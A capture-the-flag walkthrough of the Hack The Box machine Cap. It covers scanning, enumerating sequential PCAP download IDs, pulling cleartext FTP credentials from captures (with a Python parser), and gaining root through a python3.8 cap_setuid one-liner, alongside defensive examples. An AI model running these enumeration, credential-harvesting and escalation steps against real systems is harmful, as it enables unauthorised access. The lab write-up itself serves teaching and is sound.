HTB - Cap Writeup

Liam Geyer

👾 Machine Overview

This is a writeup of the machine Cap from HTB. It's an easy-difficulty Linux machine featuring IDOR, PCAP forensics, and the exploitation of a Linux file capability.

๐Ÿ” Enumeration

I started off with an Nmap scan of the box:

nmap -sV -sC -T4 -Pn 10.10.10.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-28 17:40 EDT
Nmap scan report for 10.10.10.245
Host is up (0.050s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Mon, 28 Apr 2025 21:40:46 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Mon, 28 Apr 2025 21:40:41 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Mon, 28 Apr 2025 21:40:41 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: GET, OPTIONS, HEAD
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
| </body>
|_ </html>
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.03 seconds

We can see SSH, FTP, and Web.

📂 FTP

I checked for anonymous FTP without any success.

We can see from our scan that this is running vsftpd 3.0.3. I found this exploit but it's just a DoS.

๐ŸŒ Web

Moving on to the website, we're greeted with a fancy little security dashboard.

Homepage

There are some interesting pages, including ip and netstat output.

IP Page

Netstat page

What's really interesting is the "Security Snapshot" tab. Each time we browse to this page we're given the opportunity to download a random network capture.

PCAP Page

It's not strictly IDOR, since the app has no authentication at all, but we can tumble the numerical ID in the download URL to find other PCAPs.

Burp Intruder

Using Burp Intruder we can tumble the values to discover that there are 12 PCAP files. I used the following command to download them all.

for i in {0..13}; do wget "http://10.10.10.245/download/$i"; done
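The dashboard's own code is not on the page, so the following is an added, constructed Python model (not the HTB application) of why sequential download IDs are enumerable and what the hardened version of that handler looks like: an authenticated session, an unguessable per-file token, and a server-side ownership check. The `CaptureStore`, `download_vulnerable` and `download_hardened` names are hypothetical.

```python
import secrets
from dataclasses import dataclass


@dataclass
class Capture:
    owner: str      # user the capture belongs to
    filename: str
    data: bytes


class CaptureStore:
    """Constructed in-memory stand-in for the dashboard's capture files (not the real app)."""

    def __init__(self):
        self._by_seq = {}    # sequential id -> Capture: guessable, like /download/<n>
        self._by_token = {}  # random token -> Capture: not enumerable
        self._next_seq = 0

    def add(self, owner, filename, data):
        seq = self._next_seq
        self._next_seq += 1
        token = secrets.token_urlsafe(16)  # 128 bits of randomness per capture
        cap = Capture(owner, filename, data)
        self._by_seq[seq] = cap
        self._by_token[token] = cap
        return seq, token

    def download_vulnerable(self, seq_id):
        """Hypothetical handler with the writeup's weakness: no session, no ownership
        check, and a small integer as the only lookup key."""
        cap = self._by_seq.get(seq_id)
        return cap.data if cap else None

    def download_hardened(self, session_user, token):
        """Hypothetical hardened handler: requires an authenticated session, looks the
        file up by an unguessable token, and enforces ownership server-side."""
        if not session_user:
            return None
        cap = self._by_token.get(token)
        if cap is None or cap.owner != session_user:
            return None
        return cap.data


def enumerate_sequential_ids(store, max_id):
    """Offline equivalent of the wget loop above: which ids in 0..max_id hand back a file?"""
    return [i for i in range(max_id + 1) if store.download_vulnerable(i) is not None]
```

Random tokens on their own only hide the files; the ownership check is what actually closes the hole, because a token that leaks (logs, referrers, shared links) should still not serve another user's capture.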

Opening them in Wireshark, I saw cleartext credentials for Nathan's FTP account.

Cleartext FTP Creds
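Wireshark does this interactively; as an added example (not code from the writeup), the Python below does the same PCAP forensics offline with the standard library only: it builds a small classic-format pcap from constructed frames, then walks the records, decodes Ethernet/IPv4/TCP, and reports every USER/PASS command sent to TCP port 21. The addresses are TEST-NET placeholders and the password is a placeholder, not the value from the box; only the username nathan comes from the page.

```python
import struct

PCAP_MAGIC = 0xA1B2C3D4   # classic little-endian libpcap magic, microsecond timestamps
LINKTYPE_ETHERNET = 1
FTP_PORT = 21


def _ip_bytes(dotted):
    return bytes(int(octet) for octet in dotted.split("."))


def build_tcp_frame(src_ip, dst_ip, sport, dport, payload):
    """Minimal Ethernet/IPv4/TCP frame; checksums are left zero since the parser ignores them."""
    eth = b"\x00" * 12 + struct.pack("!H", 0x0800)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     _ip_bytes(src_ip), _ip_bytes(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Wrap frames in a classic pcap file: 24-byte global header + 16-byte record headers."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def extract_ftp_credentials(pcap_bytes):
    """Return (src, dst, command, argument) for every USER/PASS sent to TCP port 21."""
    magic, = struct.unpack_from("<I", pcap_bytes, 0)
    if magic != PCAP_MAGIC:
        raise ValueError("only little-endian classic pcap is handled here (not pcapng)")
    link_type, = struct.unpack_from("<I", pcap_bytes, 20)
    if link_type != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link type is handled here")

    found = []
    offset = 24
    while offset + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack_from("<IIII", pcap_bytes, offset)
        offset += 16
        frame = pcap_bytes[offset:offset + incl_len]
        offset += incl_len
        if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != 0x0800:
            continue                                    # not IPv4
        ihl = (frame[14] & 0x0F) * 4
        if frame[14 + 9] != 6:
            continue                                    # not TCP
        src = ".".join(str(b) for b in frame[26:30])
        dst = ".".join(str(b) for b in frame[30:34])
        tcp = 14 + ihl
        if len(frame) < tcp + 20:
            continue                                    # truncated TCP header
        sport, dport = struct.unpack_from("!HH", frame, tcp)
        data_offset = (frame[tcp + 12] >> 4) * 4
        payload = frame[tcp + data_offset:]
        if dport != FTP_PORT:
            continue                                    # only the client->server control channel
        for line in payload.decode("ascii", "replace").splitlines():
            cmd, _, arg = line.partition(" ")
            if cmd.upper() in ("USER", "PASS"):
                found.append((src, dst, cmd.upper(), arg))
    return found


# Constructed sample capture: one client logging in over FTP. Addresses are TEST-NET-1
# placeholders and the password is a placeholder, not the value from the box.
SAMPLE_PCAP = build_pcap([
    build_tcp_frame("192.0.2.10", "192.0.2.1", 54215, FTP_PORT, b"USER nathan\r\n"),
    build_tcp_frame("192.0.2.1", "192.0.2.10", FTP_PORT, 54215, b"331 Please specify the password.\r\n"),
    build_tcp_frame("192.0.2.10", "192.0.2.1", 54215, FTP_PORT, b"PASS PLACEHOLDER-password\r\n"),
])

if __name__ == "__main__":
    for src, dst, cmd, arg in extract_ftp_credentials(SAMPLE_PCAP):
        print(f"{src} -> {dst}: {cmd} {arg}")
```

The same scan run over real captures is a useful hygiene check from the defender's side: any hit means a service is still accepting plaintext logins and should be moved to SFTP or FTPS, and the credential rotated.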

We can use these to SSH in as Nathan and grab the user flag.

โซ Privesc

As Nathan, I dropped and ran LinPEAS, which flagged some interesting Linux capabilities. Capabilities let a binary perform a specific privileged action without running as root or holding full root permissions.

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ Capabilities
โ•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
โ•โ•โ•ฃ Current shell capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb: 0x0000000000000000=

╚ Parent process capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb: 0x0000000000000000=


Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

Notably we see /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip. The cap_setuid capability means the Python binary can change its own user ID, so a Python process can switch to UID 0 and run as root.
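The LinPEAS section above contains two things worth being able to read without a cheat sheet: the CapXxx hex masks from /proc/<pid>/status and the getcap-style "path = caps+flags" lines. As an added example (not part of the writeup or of LinPEAS), the Python below decodes a hex mask into capability names using the kernel's bit ordering, parses both the older "+eip" and the newer libcap "=eip" getcap formats, and flags file capabilities that are root-equivalent in the permitted set, which is exactly what turns an interpreter like python3.8 into a privilege-escalation path. The `ROOT_EQUIVALENT` set and the function names are my choices; `setcap -r` in the usage note is the real libcap command for removing a file's capabilities.

```python
# Capability bit numbers in kernel order (include/uapi/linux/capability.h), bit 0 first.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner", "cap_fsetid",
    "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap", "cap_linux_immutable",
    "cap_net_bind_service", "cap_net_broadcast", "cap_net_admin", "cap_net_raw",
    "cap_ipc_lock", "cap_ipc_owner", "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot",
    "cap_sys_ptrace", "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod", "cap_lease",
    "cap_audit_write", "cap_audit_control", "cap_setfcap", "cap_mac_override",
    "cap_mac_admin", "cap_syslog", "cap_wake_alarm", "cap_block_suspend", "cap_audit_read",
]

# File capabilities that, on their own, let a local user become root or read any file.
# This is my own audit list, not something LinPEAS or the kernel defines.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
    "cap_dac_override", "cap_dac_read_search", "cap_setfcap", "cap_chown", "cap_fowner",
}


def decode_cap_mask(hex_mask):
    """Translate a CapXxx hex mask from /proc/<pid>/status into capability names."""
    mask = int(hex_mask, 16)
    names = [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]
    for bit in range(len(CAP_NAMES), mask.bit_length()):   # bits newer than our table
        if (mask >> bit) & 1:
            names.append(f"cap_{bit}")
    return names


def parse_getcap_line(line):
    """Parse 'path = cap_a,cap_b+eip' (older libcap, as LinPEAS prints it) or
    'path cap_a,cap_b=eip' (newer libcap) into (path, [names], flags)."""
    parts = line.strip().split(None, 1)
    if len(parts) != 2:
        return None
    path, spec = parts
    spec = spec.lstrip("= ").strip()
    sep = "+" if "+" in spec else "="
    names_part, _, flags = spec.partition(sep)
    names = [n.strip() for n in names_part.split(",") if n.strip()]
    return path, names, flags


def audit_file_capabilities(lines):
    """Flag binaries whose permitted ('p') file capabilities are root-equivalent."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, names, flags = parsed
        risky = sorted(ROOT_EQUIVALENT & set(names))
        if risky and "p" in flags:
            findings.append((path, risky, flags))
    return findings


# Constructed from the "Files with capabilities" lines in the LinPEAS output above.
LINPEAS_SAMPLE = [
    "/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip",
    "/usr/bin/ping = cap_net_raw+ep",
    "/usr/bin/traceroute6.iputils = cap_net_raw+ep",
    "/usr/bin/mtr-packet = cap_net_raw+ep",
    "/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep",
]

if __name__ == "__main__":
    for path, risky, flags in audit_file_capabilities(LINPEAS_SAMPLE):
        print(f"{path}: {','.join(risky)} (+{flags})")
    print(decode_cap_mask("0x0000003fffffffff"))
```

On a real host the input is `getcap -r / 2>/dev/null`, and the fix for a finding like python3.8 is `setcap -r /usr/bin/python3.8` (as root), since an interpreter with cap_setuid in its permitted set can hand root to anyone who can run it. The CapBnd mask 0x0000003fffffffff decodes to all 38 capabilities listed in the LinPEAS output, which is the normal bounding set on this kernel and not itself a finding; the empty CapEff/CapPrm masks are what show that nathan's shell currently holds none of them.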

We can run the following command to upgrade to a root shell and grab the flag.

nathan@cap:~$ python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:~# whoami
root
root@cap:~# cat /root/root.txt
[SNIPPED]

YIPPEE!!!!

  • Title: HTB - Cap Writeup
  • Author: Liam Geyer
  • Created at: 2025-04-28 00:00:00
  • Updated at: 2025-05-01 19:25:46
  • Link: https://lfgberg.org/2025/04/28/htb/cap/
  • License: This work is licensed under CC BY-NC-SA 4.0.